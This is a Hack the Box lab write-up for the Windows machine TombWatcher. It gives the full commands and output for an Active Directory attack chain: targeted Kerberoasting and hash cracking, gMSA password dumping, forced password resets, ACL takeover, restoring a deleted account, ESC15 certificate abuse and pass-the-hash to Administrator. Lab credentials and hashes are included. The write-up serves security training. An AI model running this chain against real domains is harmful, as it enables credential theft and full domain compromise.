Post

TombWatcher Medium Machine - Hack the Box

Medium-level Windows machine from Season 8.

Posted Updated
Preview Image
By Mateo Galagorri
12 min read
TombWatcher Medium Machine - Hack the Box

Information

TombWatcher Machine is a medium-level Windows machine from Season 8.
As is common in real life Windows pentests, you will start this box with credentials for the following account:
henry / H3nry_987TGV!

Tools

  • nmap
  • hashcat
  • bloodhound
  • certipy
  • evil-winrm
  • targetedKerberoast
  • bloodyAD

In some of the next steps we may get a “Clock skew too great” error. It happens because of the time gap between the target machine and ours, it can cause some troubles to communicate and to do some auth techniques.
To solve this we must run the next command:

1
2

timedatectl set-ntp off
ntpdate 10.10.11.72

Step by step

  1. Start with Nmap enum:
    1

    nmap -A -p- -T4 -v -P0 -oX tombwatcher_tcp.scan 10.10.11.72 --webxml

    1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97

    PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-08 20:07:39Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-08T20:09:14+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Issuer: commonName=tombwatcher-CA-1
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-11-16T00:47:59
| Not valid after:  2025-11-16T00:47:59
| MD5:   a396:4dc0:104d:3c58:54e0:19e3:c2ae:0666
|_SHA-1: fe5e:76e2:d528:4a33:8adf:c84e:92e3:900e:4234:ef9c
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-08T20:09:13+00:00; +3h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Issuer: commonName=tombwatcher-CA-1
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-11-16T00:47:59
| Not valid after:  2025-11-16T00:47:59
| MD5:   a396:4dc0:104d:3c58:54e0:19e3:c2ae:0666
|_SHA-1: fe5e:76e2:d528:4a33:8adf:c84e:92e3:900e:4234:ef9c
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Issuer: commonName=tombwatcher-CA-1
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-11-16T00:47:59
| Not valid after:  2025-11-16T00:47:59
| MD5:   a396:4dc0:104d:3c58:54e0:19e3:c2ae:0666
|_SHA-1: fe5e:76e2:d528:4a33:8adf:c84e:92e3:900e:4234:ef9c
|_ssl-date: 2025-06-08T20:09:14+00:00; +4h00m00s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-08T20:09:13+00:00; +3h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Issuer: commonName=tombwatcher-CA-1
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-11-16T00:47:59
| Not valid after:  2025-11-16T00:47:59
| MD5:   a396:4dc0:104d:3c58:54e0:19e3:c2ae:0666
|_SHA-1: fe5e:76e2:d528:4a33:8adf:c84e:92e3:900e:4234:ef9c
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49683/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49684/tcp open  msrpc         Microsoft Windows RPC
49685/tcp open  msrpc         Microsoft Windows RPC
49704/tcp open  msrpc         Microsoft Windows RPC
49710/tcp open  msrpc         Microsoft Windows RPC
49740/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-06-08T20:08:33
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m59s

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   145.88 ms 10.10.14.1
2   146.27 ms 10.10.11.72

    The open port 80 is just the main page of an IIS server, there is nothing useful.

  2. We can’t connect via evil-winrm with the provided credentials and there is no samba shares for the user from where we can start our research.
    However, we can proceed to recopile information through bloodhound.
    1

    bloodhound-python -d TOMBWATCHER.HTB -u henry -p 'H3nry_987TGV!' -gc dc01.tombwatcher.htb -c all -ns 10.10.11.72

    Looking into Bloodhound we should find a set of relationships, starting at our user “Henry” and finishing in the user “JOHN”, who is the first one with remote access privileges.
    The first relationship we need to exploit is the next one: the user Henry has “WriteSPN (Service Pricipal Name)” to the user Alfred.
    With this ability we can attempt to add a SPN and then do a kerberos auth to obtain a crackable hash, it’s called: Targeted Kerberoasting.

    1

    python3 targetedKerberoast.py -u henry -p 'H3nry_987TGV!' --dc-ip 10.10.11.72 -d tombwatcher.htb

    1
2
3
4

    [*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (Alfred)
$krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$78bdc1efa1535788769f12d46881abfe$1902fe7eb45f1b2c441c574b78ba9d3701e52e9d0d6fa2f15fa4da180574f7a44a8080ea14146909fe6ddd8f2a5fcd54c8ec36e37afc9506ef93adfec16bb5bb25df8508771cf45437d926657ad8fdbba2a28bc263b09f39d56f23f0b687f81cadfc47e9363d75b13b710684396fa8aa3414d45d2f8651245d3a9b5909f4ff6612826ab615056b404ca1d76cbf66be1c207ae196f9e95a2499d1ad07189c58072def5f5aac30c5bdc2847f6692c6dcefda4c4d100abee2bd34088150c2de3e620c0bf70f6d4b9b4205186314c0c5a030e12c709841186112a2c51b1905f4f25231e1f612e87ae4101b0289e6585b1fef38ae82833d73e40ad4d1570bf5369eda96c07d06eef4d4d68207bcebd38638bf0929ea83f4efc931faabc4be4c2da07fe70e6f407e2b9cf86469b6fa3f201add55b607f2008c41ed21f341268a567b63ee4563effd0ef5d970043ff9f72a9a4c8d66667fab35c788402fd4df32349472f6699c3b6569e8df62c75586d20a8efd47d2794d6ad8502e26808c9c833bb1ce721ec4024f7e55c8c6944cc13b0198b05d2a257850f73ccf35a235fb0abcb0286416ab086509f49151b8ec337939003d9366a11587513e32a92384c55315fc644e9bc4deb080d2b3aabb9eb727049ab4ac9ff4e2f1b1d3e2844ec76ae867e186976c3813a00cf50be644d7374a3173ebd9a9e2b91457233a1c477622b05dab405df71aaf6d5683b527b184bbadb46514fecb0f0816b649eefdd61950443539a76da5d7a0e82365a3667b9c72153159ba50c41cca242911fbaacdd26ff03a53c718f23b31a922dea7dba1f8d3fa7ac6260489015ac7120084dc8e3e9f3d2664542adde6c97a2af25c8ce615a8e5c9fde0508a14f8967864bb599bec7a8119ce57fe861c9749e82afe1f82a282f9fb8c76a76d2bb9d6b4e5d7e584d5958e333853cd85a62638fe4cfbd92f5312ba83b898396530b40b00c440db8ab98fa4f23af479810110738c41b52ae32e34e5d6d7c1cae67f2b89b47a395a4e8b17c9679405bff432c2e9f4dd241f0de1d8d92216f37fd9d16417aed360131ff14a5d9d80cdd8df6b963979edb4524c5ecb5d10931c332fd5580243d64e6755cb7f0be802a63724ef857b09d191a14848d5205b5ab4f64711d6d2a1a6f9cbf91993d1fab39390f106585652674ae6b06ab44e74217dc2e8508200cf04f79817bf30ed9fa1d80c3a9399da0cb5e4bb21fc270fa48be67d0884d0ac396277916c35b50e7318c7bbf7c635c042cc0c9d0199dd7b90e8ddecfbf891dc708a4fec5f79960d1f68c0bdd0dd6ed25211ec280937a8db1e3b5705073a8604bddbb94591b66cfb6a40fc0b85614dc5be981db0877fb3c6f1404035ef3255c8cc83dd544e389ab8e6c8252a2c7a1f292788126a34c4a11c878fe70e1dd3f324fbebabf878c8ddf88acbbe317c4c9d6fc6f075e5a9bdf4b55a9598f23011fc20
  3. Now, we can try to crack the hash:
    1

    hashcat alfred_hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt

    Password obtained: basketball.
    With this new credential we can continue exploiting the vulnerabilities: the user Alfred has “AddSelf” to the group INFRASTRUCTURE.
    This ability allow us to add the user Alfred to the group INFRASTRUCTURE.

  4. 1

    bloodyAD --host "10.10.11.72" -d "tombwatcher.htb" -u "alfred" -p "basketball" add groupMember "INFRASTRUCTURE" "alfred"

    Then, we have the next relationship: the group INFRASTRUCTURE has “ReadGMSAPassword” to ANSIBLE_DEV$ (Group managed service account).
    The explanation of how this can be exploited is as follows (bloodhound):
    Group Managed Service Accounts are a special type of Active Directory object, where the password for that object is mananaged by and automatically changed by Domain Controllers on a set interval (check the MSDS-ManagedPasswordInterval attribute).
    The intended use of a GMSA is to allow certain computer accounts to retrieve the password for the GMSA, then run local services as the GMSA. An attacker with control of an authorized principal may abuse that privilege to impersonate the GMSA.

    1

    python3 gMSADumper.py -u alfred -p basketball -d tombwatcher.htb

    1
2
3
4
5

    Users or groups who can read password for ansible_dev$:
> Infrastructure
ansible_dev$:::1c37d00093dc2a5f25176bf2d474afdc
ansible_dev$:aes256-cts-hmac-sha1-96:526688ad2b7ead7566b70184c518ef665cc4c0215a1d634ef5f5bcda6543b5b3
ansible_dev$:aes128-cts-hmac-sha1-96:91366223f82cd8d39b0e767f0061fd9a
  5. With the previous obtained hash we can proceed with the next one: ANSIBLE_DEV$ has ForceChangePassword to the user SAM.
    As the name suggests, we can change the password of the user SAM.
    1

    bloodyAD --host "10.10.11.72" -d "tombwatcher.htb" -u "ANSIBLE_DEV$" -p :1c37d00093dc2a5f25176bf2d474afdc set password "sam" "Test1234."
  6. Finally, with the user SAM we can take control of the user JOHN: the user SAM has WriteOwner to the user John.
    Changing the owner, allow us to have a full set of implicit owner rights.
    1
2

    impacket-owneredit -action write -new-owner 'sam' -target 'john' 'tombwatcher.htb'/'sam':'Test1234.'
impacket-dacledit -action 'write' -rights 'FullControl' -principal 'sam' -target 'john' 'tombwatcher.htb'/'sam':'Test1234.'

    Then, we can force change the password:

    1

    bloodyAD --host "10.10.11.72" -d "tombwatcher.htb" -u "sam" -p "Test1234." set password "john" "Test1234."

    Optionally (but recommended), we can do a cleanup of the added ACL:

    1

    impacket-dacledit -action 'remove' -rights 'FullControl' -principal 'sam' -target 'john' 'tombwatcher.htb'/'sam':'Test1234.'

    1

    evil-winrm -i 10.10.11.72 -u john -p 'Test1234.'

:trophy: USER FLAG PWNED :trophy:

Now, for privilege escalation, things get a bit tricky.
By inspecting the user JOHN, we can observe that he has a GenericAll relationship over the ADCS Organizational Unit. While this may not seem useful at first, it actually grants us broad control over objects within that OU — which opens up several possible attack paths.

  1. At first glance, running Certipy doesn’t reveal any templates marked as vulnerable. However, with a closer look, we can find something suspicious:
    1

    certipy-ad find -u john@tombwatcher.htb -p 'Test1234.' -dc-ip 10.10.11.72 -stdout

    1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

    7
 Template Name                       : WebServer
 Display Name                        : Web Server
 Certificate Authorities             : tombwatcher-CA-1
 Enabled                             : True
 Client Authentication               : False
 Enrollment Agent                    : False
 Any Purpose                         : False
 Enrollee Supplies Subject           : True
 Certificate Name Flag               : EnrolleeSuppliesSubject
 Extended Key Usage                  : Server Authentication
 Requires Manager Approval           : False
 Requires Key Archival               : False
 Authorized Signatures Required      : 0
 Schema Version                      : 1
 Validity Period                     : 2 years
 Renewal Period                      : 6 weeks
 Minimum RSA Key Length              : 2048
 Template Created                    : 2024-11-16T00:57:49+00:00
 Template Last Modified              : 2024-11-16T17:07:26+00:00
 Permissions
   Enrollment Permissions
     Enrollment Rights               : TOMBWATCHER.HTB\Domain Admins
                                       TOMBWATCHER.HTB\Enterprise Admins
                                       S-1-5-21-1392491010-1358638721-2126982587-1111
   Object Control Permissions
     Owner                           : TOMBWATCHER.HTB\Enterprise Admins
     Full Control Principals         : TOMBWATCHER.HTB\Domain Admins
                                       TOMBWATCHER.HTB\Enterprise Admins
     Write Owner Principals          : TOMBWATCHER.HTB\Domain Admins
                                       TOMBWATCHER.HTB\Enterprise Admins
     Write Dacl Principals           : TOMBWATCHER.HTB\Domain Admins
                                       TOMBWATCHER.HTB\Enterprise Admins
     Write Property Enroll           : TOMBWATCHER.HTB\Domain Admins
                                       TOMBWATCHER.HTB\Enterprise Admins
                                       S-1-5-21-1392491010-1358638721-2126982587-1111

    If we look into the Permissions section, we would see S-1-5-21-1392491010-1358638721-2126982587-1111. This SID is not resolved to a human-readable name, which usually indicates that the original object (a user or group) has been deleted from Active Directory. This can suggest a potential misconfiguration or orphaned privilege still present on the template. If the SID belonged to a previously user with vulnerabilites, this could be leveraged for privilege escalation or abuse of certificate enrollment.

  2. With the previous information, and guided by the machine name (TombWatcher), we can check the Active Directory Recycle Bin (on the host) for deleted users. We should find a deleted user whose SID matches the one found in the certificate template permissions:
    1

    Get-ADObject -Filter 'IsDeleted -eq $true' -IncludeDeletedObjects -Properties *

    1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

    CanonicalName                   : tombwatcher.htb/Deleted Objects/cert_admin
                               DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
CN                              : cert_admin
                                 DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
codePage                        : 0
countryCode                     : 0
Created                         : 11/16/2024 12:07:04 PM
createTimeStamp                 : 11/16/2024 12:07:04 PM
Deleted                         : True
Description                     :
DisplayName                     :
DistinguishedName               : CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb
dSCorePropagationData           : {11/16/2024 12:07:10 PM, 11/16/2024 12:07:08 PM, 12/31/1600 7:00:00 PM}
givenName                       : cert_admin
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=ADCS,DC=tombwatcher,DC=htb
lastLogoff                      : 0
lastLogon                       : 0
logonCount                      : 0
Modified                        : 11/16/2024 12:07:27 PM
modifyTimeStamp                 : 11/16/2024 12:07:27 PM
msDS-LastKnownRDN               : cert_admin
Name                            : cert_admin
                                 DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
objectSid                       : S-1-5-21-1392491010-1358638721-2126982587-1111
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 133762504248946345
sAMAccountName                  : cert_admin
sDRightsEffective               : 7
sn                              : cert_admin
userAccountControl              : 66048
uSNChanged                      : 13197
uSNCreated                      : 13186
whenChanged                     : 11/16/2024 12:07:27 PM
whenCreated                     : 11/16/2024 12:07:04 PM

    Another key detail is that the cert_admin user was originally located in the ADCS OU, over which we have control.

  3. Now, we can restore the deleted user and reset their password for further exploitation:
    1
2

    Restore-ADObject -Identity "CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb"
Set-ADAccountPassword -Identity "cert_admin" -Reset -NewPassword (ConvertTo-SecureString "Test1234." -AsPlainText -Force)

    With the restored account, we can rerun Certipy to check if we now have access to a vulnerable certificate template.

  4. 1

    certipy-ad find -vulnerable -u cert_admin@tombwatcher.htb -p 'Test1234.' -dc-ip 10.10.11.72 -stdout

    This time, the WebServer template, which was not previously marked as vulnerable, is now identified as vulnerable:

    1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42

    Certificate Templates
0
   Template Name                       : WebServer
   Display Name                        : Web Server
   Certificate Authorities             : tombwatcher-CA-1
   Enabled                             : True
   Client Authentication               : False
   Enrollment Agent                    : False
   Any Purpose                         : False
   Enrollee Supplies Subject           : True
   Certificate Name Flag               : EnrolleeSuppliesSubject
   Extended Key Usage                  : Server Authentication
   Requires Manager Approval           : False
   Requires Key Archival               : False
   Authorized Signatures Required      : 0
   Schema Version                      : 1
   Validity Period                     : 2 years
   Renewal Period                      : 6 weeks
   Minimum RSA Key Length              : 2048
   Template Created                    : 2024-11-16T00:57:49+00:00
   Template Last Modified              : 2024-11-16T17:07:26+00:00
   Permissions
      Enrollment Permissions
      Enrollment Rights               : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
                                          TOMBWATCHER.HTB\cert_admin
      Object Control Permissions
      Owner                           : TOMBWATCHER.HTB\Enterprise Admins
      Full Control Principals         : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
      Write Owner Principals          : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
      Write Dacl Principals           : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
      Write Property Enroll           : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
                                          TOMBWATCHER.HTB\cert_admin
   [+] User Enrollable Principals      : TOMBWATCHER.HTB\cert_admin
   [!] Vulnerabilities
      ESC15                             : Enrollee supplies subject and schema version is 1.
   [*] Remarks
      ESC15                             : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.
  5. Finally, we can just exploit the ESC15 Vulnerability.
    Note: According to the wiki, we need to follow Scenario B. If we mistakenly follow Scenario A, we’ll end up with a ldap_shell, which is not useful in this case.
    1
2
3
4
5
6
7
8

    # Step 1: Request a certificate using the vulnerable template with the Certificate Request Agent policy
certipy-ad req -u 'cert_admin@tombwatcher.htb' -p 'Test1234.' -dc-ip '10.10.11.72' -target 'dc01.tombwatcher.htb' -ca 'tombwatcher-CA-1' -template 'WebServer' -application-policies 'Certificate Request Agent'

# Step 2: Use that certificate to request another one on behalf of the domain admin
certipy-ad req -u 'cert_admin@tombwatcher.htb' -p 'Test1234.' -dc-ip '10.10.11.72' -target 'dc01.tombwatcher.htb' -ca 'tombwatcher-CA-1' -template 'User' -pfx 'cert_admin.pfx' -on-behalf-of 'TOMBWATCHER\Administrator'

# Step 3: Authenticate using the obtained certificate
certipy-ad auth -pfx 'administrator.pfx' -dc-ip '10.10.11.72'

    1

    evil-winrm -i 10.10.11.72 -u Administrator -H f61db423bebe3328d33af26741afe5fc

:trophy: ROOT FLAG PWNED :trophy:

Cybersecurity, HackTheBox
htb cybersec pentest guide medium windows
This post is licensed under CC BY 4.0 by the author.